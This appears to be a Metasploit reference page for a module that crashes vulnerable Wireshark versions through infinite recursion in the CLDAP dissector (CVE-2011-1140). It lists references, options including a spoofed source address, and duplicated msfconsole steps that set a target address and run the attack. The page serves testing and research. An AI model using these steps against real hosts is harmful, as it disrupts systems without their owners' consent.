Wireshark CLDAP Dissector DOS
This module causes infinite recursion to occur within the CLDAP dissector by sending a specially crafted UDP packet.
Rank
- Normal
Authors
- joernchen <joernchen < joernchen <joernchen [at] phenoelit.de> (Phenoelit) >
Vulnerability References
- CVE-2011-1140
- OSVDB-71552
- http://www.wireshark.org/security/wnpa-sec-2011-04.html
- https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717
Development
Similar Modules
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/cldap
msf auxiliary(cldap) > set RHOST [TARGET IP]
msf auxiliary(cldap) > run
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use auxiliary/dos/wireshark/cldap
msf auxiliary(cldap) > set RHOST [TARGET IP]
msf auxiliary(cldap) > run
Module Options
| RHOST | The target address |
| RPORT | The destination port (default: 389) |
| SHOST | This option can be used to specify a spoofed source address |
| CHOST | The local client address |
| CPORT | The local client port |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |